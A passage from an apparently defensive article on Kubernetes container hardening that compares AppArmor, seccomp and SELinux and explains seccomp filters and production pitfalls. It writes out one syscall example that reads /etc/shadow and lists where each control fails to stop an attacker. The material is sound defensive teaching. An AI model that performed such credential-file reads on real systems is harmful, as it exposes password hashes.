&lt;p&gt;&lt;strong&gt;In-memory attacks&lt;/strong&gt;: AppArmor is path-based and capability-based. It has no visibility into what happens in memory. A process with permitted capabilities can still execute &lt;a href="https://en.wikipedia.org/wiki/Heap_spraying" rel="noopener noreferrer"&gt;heap sprays&lt;/a&gt;, &lt;a href="https://en.wikipedia.org/wiki/Return-oriented_programming" rel="noopener noreferrer"&gt;ROP&lt;/a&gt; chains, or in-process exploitation. Runtime detection tools like &lt;a href="https://falco.org/" rel="noopener noreferrer"&gt;Falco&lt;/a&gt; or &lt;a href="https://tetragon.io/" rel="noopener noreferrer"&gt;Tetragon&lt;/a&gt; — which observe syscall patterns using eBPF — are the right layer for this.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Kernel vulnerabilities&lt;/strong&gt;: AppArmor is a kernel module that hooks via LSM interfaces. An exploit that compromises the kernel below those hooks bypasses AppArmor entirely. &lt;a href="https://nvd.nist.gov/vuln/detail/cve-2022-0185" rel="noopener noreferrer"&gt;CVE-2022-0185&lt;/a&gt; (a kernel heap overflow enabling container escape) is a real example — no AppArmor profile would have stopped it because the exploit occurred before LSM enforcement points were reached.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Misloaded profiles&lt;/strong&gt;: Depending on your runtime version and Kubernetes version, a missing &lt;code&gt;Localhost&lt;/code&gt; profile may either cause pod admission failure or allow the container to start without confinement. This variance is precisely why profile lifecycle management must be automated — the SPO's status reporting makes this observable; bare annotation approaches fail silently.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Path-based bypasses&lt;/strong&gt;: As described above — bind mounts and mount namespace manipulation can cause policy to evaluate against a path that resolves to an unintended inode.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  AppArmor vs. Seccomp vs. SELinux: An Opinionated Take
&lt;/h2&gt;

&lt;p&gt;These three are frequently described as interchangeable. They're not — they enforce different things at different kernel hook points.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuochbu7auzgfdtr5x6cs.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fuochbu7auzgfdtr5x6cs.png" alt="image" width="800" height="308"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Choosing AppArmor vs. SELinux at Platform Level
&lt;/h3&gt;

&lt;p&gt;Most platform teams don't choose between AppArmor and SELinux for purely technical reasons. They choose based on &lt;strong&gt;node OS standardization&lt;/strong&gt; — which is already determined before the security conversation happens.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Node OS&lt;/th&gt;
&lt;th&gt;MAC default&lt;/th&gt;
&lt;th&gt;Practical choice&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Ubuntu / Debian&lt;/td&gt;
&lt;td&gt;AppArmor&lt;/td&gt;
&lt;td&gt;Use AppArmor&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RHEL / CentOS / OpenShift&lt;/td&gt;
&lt;td&gt;SELinux&lt;/td&gt;
&lt;td&gt;Use SELinux&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Heterogeneous (both)&lt;/td&gt;
&lt;td&gt;Neither by default&lt;/td&gt;
&lt;td&gt;Pick one, standardize&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The operational cost of running both MAC engines across heterogeneous nodes — maintaining separate toolchains, policy languages, expertise, and audit pipelines — almost always outweighs any technical benefit. In practice, consistency of tooling and policy management matters more than the underlying MAC engine.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Control Failure Mode Comparison
&lt;/h3&gt;

&lt;p&gt;This is the table most comparison posts omit: not what each control &lt;em&gt;does&lt;/em&gt;, but what each control &lt;em&gt;fails to stop&lt;/em&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Scenario&lt;/th&gt;
&lt;th&gt;Seccomp&lt;/th&gt;
&lt;th&gt;AppArmor&lt;/th&gt;
&lt;th&gt;Why&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Block &lt;code&gt;mount()&lt;/code&gt; entirely&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;Seccomp can block the syscall number; AppArmor mediates objects, not syscall invocation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Restrict &lt;code&gt;/etc/passwd&lt;/code&gt; reads&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;Seccomp can't dereference path arguments; AppArmor is path-aware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stop kernel exploit (pre-LSM)&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;Both operate inside the kernel; pre-hook exploits bypass both&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stop &lt;code&gt;open()&lt;/code&gt; misuse on allowed fd&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;Seccomp allows &lt;code&gt;open()&lt;/code&gt; broadly; AppArmor restricts what it can open&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block namespace-creating &lt;code&gt;clone()&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;✅&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;Argument filtering on &lt;code&gt;clone&lt;/code&gt; flags; AppArmor doesn't intercept syscall invocation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Prevent network exfiltration&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;⚠️ Partial&lt;/td&gt;
&lt;td&gt;Seccomp can't; AppArmor can block protocol families but not destinations&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Detect in-memory exploits&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;❌&lt;/td&gt;
&lt;td&gt;Neither has memory visibility; needs Falco/Tetragon&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The table makes one thing clear: these two controls have almost no overlap in what they stop. They're not alternatives — they're complements covering different axes of the attack surface.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  When Is seccomp Alone Enough?
&lt;/h3&gt;

&lt;p&gt;Seccomp &lt;code&gt;RuntimeDefault&lt;/code&gt; blocks syscalls that are rarely needed and frequently abused — &lt;code&gt;keyctl&lt;/code&gt;, &lt;code&gt;kexec_load&lt;/code&gt;, &lt;code&gt;ptrace&lt;/code&gt;, &lt;code&gt;mount&lt;/code&gt;, &lt;code&gt;unshare&lt;/code&gt;, and others. For many workloads, this provides the most impactful risk reduction per unit of operational effort.&lt;/p&gt;

&lt;p&gt;Add AppArmor when:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;You need path-level access control (restrict reads to specific filesystem subtrees)&lt;/li&gt;
&lt;li&gt;You're running multi-tenant workloads and need isolation between namespace tenants&lt;/li&gt;
&lt;li&gt;You need explicit capability access control beyond what the Pod &lt;code&gt;securityContext&lt;/code&gt; expresses&lt;/li&gt;
&lt;li&gt;You're building toward a compliance posture that requires &lt;a href="https://hoop.dev/blog/understanding-mandatory-access-control-mac-in-security-posture/" rel="noopener noreferrer"&gt;MAC&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Stay with seccomp-only when:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Your nodes are heterogeneous (mixed OS) and profile management would span both engines&lt;/li&gt;
&lt;li&gt;Your workloads are internal tooling with low breach impact&lt;/li&gt;
&lt;li&gt;The operational cost of profile lifecycle management exceeds your team's capacity&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The right answer is not "AppArmor everywhere" — it's "AppArmor where the containment value exceeds the operational cost."&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  LSM Stacking: The Frontier
&lt;/h3&gt;

&lt;p&gt;Modern Linux kernels (5.7+) support &lt;strong&gt;&lt;a href="https://lwn.net/Articles/804906/" rel="noopener noreferrer"&gt;LSM stacking&lt;/a&gt;&lt;/strong&gt;, which means AppArmor, SELinux, BPF-LSM, and Landlock can coexist in the same kernel, each enforcing at their respective hooks — though the exact combinations available depend on kernel configuration and distribution defaults. In hardened environments where stacking is supported, this enables layered MAC enforcement that goes well beyond any single module.&lt;/p&gt;

&lt;p&gt;Tetragon takes this further: where AppArmor is a static policy engine evaluated at access time, Tetragon uses eBPF to enforce dynamic policy based on runtime context — process ancestry, argument values, network connection state — things AppArmor cannot express. If you're running Tetragon, AppArmor and eBPF enforcement are complementary, not competing.&lt;/p&gt;

&lt;p&gt;The practical answer for most clusters: &lt;strong&gt;seccomp everywhere&lt;/strong&gt; as a syscall filter, &lt;strong&gt;AppArmor on Ubuntu/Debian nodes&lt;/strong&gt; for filesystem and capability restrictions, and &lt;strong&gt;SELinux on RHEL-based nodes&lt;/strong&gt;. On kernel 5.7+, investigate &lt;a href="https://lwn.net/Articles/1042625/" rel="noopener noreferrer"&gt;BPF-LSM&lt;/a&gt; for workloads that need dynamic policy.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Seccomp: Deeper Than You Think
&lt;/h2&gt;

&lt;p&gt;The comparison section above treats seccomp as a peer of AppArmor. It is — but most engineers use it at a much shallower level than AppArmor because the documentation stops at "configure RuntimeDefault and move on." Here's what staff-level seccomp understanding looks like.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The cBPF Filter Model
&lt;/h3&gt;

&lt;p&gt;Seccomp filters are &lt;strong&gt;&lt;a href="https://docs.kernel.org/bpf/classic_vs_extended.html" rel="noopener noreferrer"&gt;classic BPF (cBPF) programs&lt;/a&gt;&lt;/strong&gt;, not eBPF. This distinction matters:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Filters are compiled into a set of instructions evaluated in kernel context on every syscall entry&lt;/li&gt;
&lt;li&gt;Execution is intentionally constrained: no loops, bounded instruction count, no memory allocation&lt;/li&gt;
&lt;li&gt;This constraint is a feature — it guarantees the filter cannot hang or crash the kernel&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Unlike &lt;a href="https://ebpf.io/" rel="noopener noreferrer"&gt;eBPF&lt;/a&gt; observability tools (Falco, Tetragon) which can maintain maps, call helper functions, and do complex processing, a seccomp filter is a simple decision function: given this syscall number and these argument values, return an action. That simplicity is why seccomp is evaluated &lt;em&gt;first&lt;/em&gt; — before any LSM hook, before capability checks, before kernel logic runs at all.&lt;/p&gt;

&lt;p&gt;The filter is attached per-process (inheritable by children) and evaluated on every syscall entry. Attaching a filter requires &lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt; or the &lt;code&gt;no_new_privs&lt;/code&gt; bit to be set — which is why &lt;code&gt;allowPrivilegeEscalation: false&lt;/code&gt; is a prerequisite to meaningful seccomp enforcement.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Return Actions (More Than Allow/Deny)
&lt;/h3&gt;

&lt;p&gt;RuntimeDefault uses &lt;code&gt;SCMP_ACT_ERRNO&lt;/code&gt; for blocked syscalls. But seccomp has a richer action set that custom profiles can leverage:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Action&lt;/th&gt;
&lt;th&gt;Behavior&lt;/th&gt;
&lt;th&gt;Use Case&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_ALLOW&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Syscall proceeds&lt;/td&gt;
&lt;td&gt;Normal operation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_ERRNO&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Returns configurable errno&lt;/td&gt;
&lt;td&gt;Default for RuntimeDefault; graceful failure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_KILL_PROCESS&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Immediately kills the process&lt;/td&gt;
&lt;td&gt;Highest-risk syscalls (&lt;code&gt;ptrace&lt;/code&gt;, &lt;code&gt;kexec_load&lt;/code&gt;)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_LOG&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Logs the syscall, allows it&lt;/td&gt;
&lt;td&gt;Audit mode — building a profile from production traffic&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_TRACE&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Notifies a ptrace tracer&lt;/td&gt;
&lt;td&gt;Policy development tooling&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;SCMP_ACT_NOTIFY&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Sends event to userspace supervisor via fd&lt;/td&gt;
&lt;td&gt;See below&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;The most powerful and least-known action is &lt;code&gt;SCMP_ACT_NOTIFY&lt;/code&gt; (introduced in kernel 5.0). It sends the syscall event to a userspace supervisor via a file descriptor — the container's syscall is paused until the supervisor makes a decision. This turns seccomp into a programmable enforcement point: a policy engine can inspect the syscall's arguments, look up process context, consult external state, and then approve or deny — all before the kernel executes anything. This is how tools like &lt;code&gt;sysbox&lt;/code&gt; implement OCI-compliant syscall interception without full &lt;a href="https://gvisor.dev/" rel="noopener noreferrer"&gt;gVisor&lt;/a&gt; overhead.&lt;/p&gt;

&lt;p&gt;For most Kubernetes workloads you'll never need &lt;code&gt;SCMP_ACT_NOTIFY&lt;/code&gt;, but understanding it exists clarifies what seccomp &lt;em&gt;is&lt;/em&gt;: not just a static blocklist, but a kernel-userspace interception interface with real programmability.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Argument Filtering: The Underused Power Feature
&lt;/h3&gt;

&lt;p&gt;Most engineers know seccomp filters on syscall &lt;em&gt;numbers&lt;/em&gt;. Fewer know it can filter on syscall &lt;em&gt;arguments&lt;/em&gt;.&lt;/p&gt;

&lt;p&gt;Seccomp's cBPF instructions can inspect the syscall argument registers. This enables policies like:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"syscalls"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"names"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s2"&gt;"clone"&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_ACT_ALLOW"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="nl"&gt;"args"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"index"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"value"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;2114060288&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt;
          &lt;/span&gt;&lt;span class="nl"&gt;"op"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"SCMP_CMP_MASKED_EQ"&lt;/span&gt;&lt;span class="w"&gt;
        &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
      &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Concretely, argument filtering enables:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Allow &lt;code&gt;open()&lt;/code&gt; for read-only, deny write&lt;/strong&gt;: check the flags argument for &lt;code&gt;O_RDWR&lt;/code&gt; or &lt;code&gt;O_WRONLY&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Block &lt;code&gt;clone()&lt;/code&gt; with namespace-creating flags&lt;/strong&gt;: the RuntimeDefault profile already does this — it doesn't block &lt;code&gt;clone&lt;/code&gt; entirely (threads need it), it blocks the &lt;code&gt;CLONE_NEWUSER&lt;/code&gt; / &lt;code&gt;CLONE_NEWNS&lt;/code&gt; flag combinations that enable container escapes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Restrict &lt;code&gt;prctl()&lt;/code&gt; operations&lt;/strong&gt;: allow &lt;code&gt;PR_SET_NAME&lt;/code&gt; (used by many runtimes), block &lt;code&gt;PR_SET_DUMPABLE&lt;/code&gt; and &lt;code&gt;PR_CAP_AMBIENT&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Argument filtering is how RuntimeDefault blocks namespace-creating &lt;code&gt;clone()&lt;/code&gt; without breaking thread creation in multithreaded applications — a subtlety that gets lost in "seccomp blocks 44 syscalls" summaries.&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Two Non-Obvious Properties
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Seccomp filters are per-thread, not per-container.&lt;/strong&gt; The filter is attached to a process and inherited by threads and child processes. In multithreaded applications, each thread runs under the same filter — but thread-specific behavior (signal handling, JVM internal threads, async runtimes) can produce syscall patterns that weren't covered during profile generation. JVM profiling windows that only observed the main application thread frequently miss the GC thread's &lt;code&gt;madvise&lt;/code&gt; and &lt;code&gt;mmap&lt;/code&gt; patterns.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Seccomp is not namespace-aware.&lt;/strong&gt; The filter applies equally regardless of which container, namespace, or cgroup the thread belongs to. A seccomp filter attached to a process doesn't know it's running inside a container. This is both a strength (it can't be bypassed by namespace tricks) and a limitation (you can't express "allow &lt;code&gt;mount()&lt;/code&gt; inside the container's mount namespace but deny it in the host namespace" — that distinction lives in the capability and LSM layers, not seccomp).&lt;/p&gt;

&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  What Seccomp Won't Stop
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Seccomp has no concept of paths.&lt;/strong&gt; It sees &lt;code&gt;openat(AT_FDCWD, "/etc/shadow", O_RDONLY)&lt;/code&gt; as a permitted &lt;code&gt;openat&lt;/code&gt; syscall — unless you've also checked the path argument. But path arguments are memory pointers, not inline values, and cBPF can't dereference pointers. Seccomp fundamentally cannot enforce path-level access control. That's AppArmor's domain.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Seccomp cannot enforce stateful policies.&lt;/strong&gt; Each syscall decision is independent. Seccomp cannot say "allow the first &lt;code&gt;open()&lt;/code&gt; to this fd but deny the third" or "allow &lt;code&gt;connect()&lt;/code&gt; unless the previous &lt;code&gt;execve()&lt;/code&gt; was suspicious." For stateful, context-aware enforcement, you need eBPF-based tools (Tetragon) or &lt;code&gt;SCMP_ACT_NOTIFY&lt;/code&gt; with a userspace supervisor.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Seccomp cannot prevent allowed syscall abuse.&lt;/strong&gt; If &lt;code&gt;write()&lt;/code&gt; is allowed and an attacker has an open fd to a sensitive file, seccomp won't stop the write. Allowing a syscall means allowing it — what it operates on is AppArmor's responsibility.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Argument filtering has coverage limits.&lt;/strong&gt; Pointer arguments (file paths, struct pointers) cannot be dereferenced by cBPF. Only integer-valued arguments (flags, fd numbers, mode values) can be reliably checked.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Seccomp answers "&lt;em&gt;can this syscall be invoked?&lt;/em&gt;" but not "&lt;em&gt;what does this syscall operate on?&lt;/em&gt;"&lt;/p&gt;
&lt;/blockquote&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  A Threat Scenario: Container Escape Attempt
&lt;/h2&gt;

&lt;p&gt;Let's make this concrete. An attacker has achieved code execution inside a container via a deserialization vulnerability. What happens?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fswm77afxbepg1wixkpg7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fswm77afxbepg1wixkpg7.png" alt="image" width="800" height="247"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Note that attack vector 2 is only blocked if you've explicitly added &lt;code&gt;deny @{PROC}/*/maps r&lt;/code&gt; to your profile. Many &lt;code&gt;RuntimeDefault&lt;/code&gt; profiles do not include this denial. This is a good example of why "we have AppArmor" and "we have AppArmor enforcing what we think it is" are different claims.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  What Breaks First in Production
&lt;/h2&gt;

&lt;p&gt;Theory is necessary. Operational experience is different. Here's what actually causes profile-related incidents:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Java and JVM workloads&lt;/strong&gt; write to unexpected temp paths at startup — often derived from system properties and JDK version. A profile tight enough to deny &lt;code&gt;/tmp/hsperfdata_*&lt;/code&gt; will break JVM health checks. Generate profiles from running workloads, not from documentation.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Dynamic language runtimes&lt;/strong&gt; (Python, Ruby, Node.js) load shared libraries and modules from paths that vary by distribution and package version. &lt;code&gt;/usr/lib/x86_64-linux-gnu/**&lt;/code&gt; may need to be explicitly allowed, and that path is distribution-specific.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Sidecars accessing shared volumes&lt;/strong&gt;: If your app container and a sidecar (e.g., an Envoy proxy or log shipper) share an &lt;code&gt;emptyDir&lt;/code&gt;, both containers need profiles that permit access to that volume's underlying path. The actual path under &lt;code&gt;/var/lib/kubelet/pods/&lt;/code&gt; is unpredictable — use &lt;code&gt;@{run}&lt;/code&gt; and path globs carefully, or use a dedicated volume mount path that's consistent.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Health and readiness probes&lt;/strong&gt;: Kubernetes exec probes run inside the container's process namespace. If your probe invokes &lt;code&gt;/bin/sh&lt;/code&gt; or &lt;code&gt;/bin/curl&lt;/code&gt; and your profile restricts shell execution, probes will fail. Either allow the probe binary explicitly or switch to HTTP/TCP probes that don't require exec.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Profile load ordering on node startup&lt;/strong&gt;: If a node reboots and the SPO pod hasn't yet reconciled profiles before a workload pod schedules, the workload pod may fail admission. Build node readiness checks that verify profile presence, or use pod disruption budgets and node cordoning during maintenance windows.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Performance Considerations
&lt;/h2&gt;

&lt;p&gt;AppArmor's overhead is generally low, but not zero, and it scales with profile complexity.&lt;/p&gt;

&lt;p&gt;The cost is incurred at &lt;strong&gt;file open, exec, and network operations&lt;/strong&gt; — each requires an LSM hook traversal and a policy lookup. For most workloads, this is imperceptible. For workloads doing high-frequency file I/O (logging pipelines, database engines, build systems), a dense profile with many path rules can add measurable latency to path lookups.&lt;/p&gt;

&lt;p&gt;Practical guidance: keep profiles focused. A profile with 20 precise rules is faster and easier to audit than one with 200 broad globs. Avoid &lt;code&gt;/**&lt;/code&gt; catch-alls on performance-sensitive paths — use specific subtree rules. And in complain mode, audit noise from high-frequency deny events can itself affect throughput; don't leave workloads in complain mode indefinitely.&lt;/p&gt;




&lt;p&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  A Production-Grade Pod Spec
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight yaml"&gt;&lt;code&gt;&lt;span class="na"&gt;apiVersion&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;v1&lt;/span&gt;
&lt;span class="na"&gt;kind&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;Pod&lt;/span&gt;
&lt;span class="na"&gt;metadata&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;hardened-app&lt;/span&gt;
  &lt;span class="na"&gt;namespace&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="s"&gt;production&lt;/span&gt;
&lt;span class="na"&gt;spec&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;
  &lt;span class="na"&gt;automountServiceAccountToken&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;false&lt;/span&gt;  &lt;span class="c1"&gt;# disable default SA token mount — most pods don't need API access&lt;/span&gt;
  &lt;span class="na"&gt;securityContext&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt;                     &lt;span class="c1"&gt;# pod-level: applies to all containers&lt;/span&gt;
    &lt;span class="na"&gt;runAsNonRoot&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;                 &lt;span class="c1"&gt;# kubelet rejects the pod if the image runs as UID 0&lt;/span&gt;
    &lt;span class="na"&gt;runAsUser&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1001&lt;/span&gt;                    &lt;span class="c1"&gt;# explicit UID — avoid root (0) and well-known service UIDs&lt;/span&gt;
    &lt;span class="na"&gt;runAsGroup&lt;/span&gt;&lt;span class="pi"&gt;:&lt;/span&gt; &lt;span class="m"&gt;1001&lt;/span&gt;                   &lt;span class="c1"&gt;# primary GID for the process&lt;/span&gt;
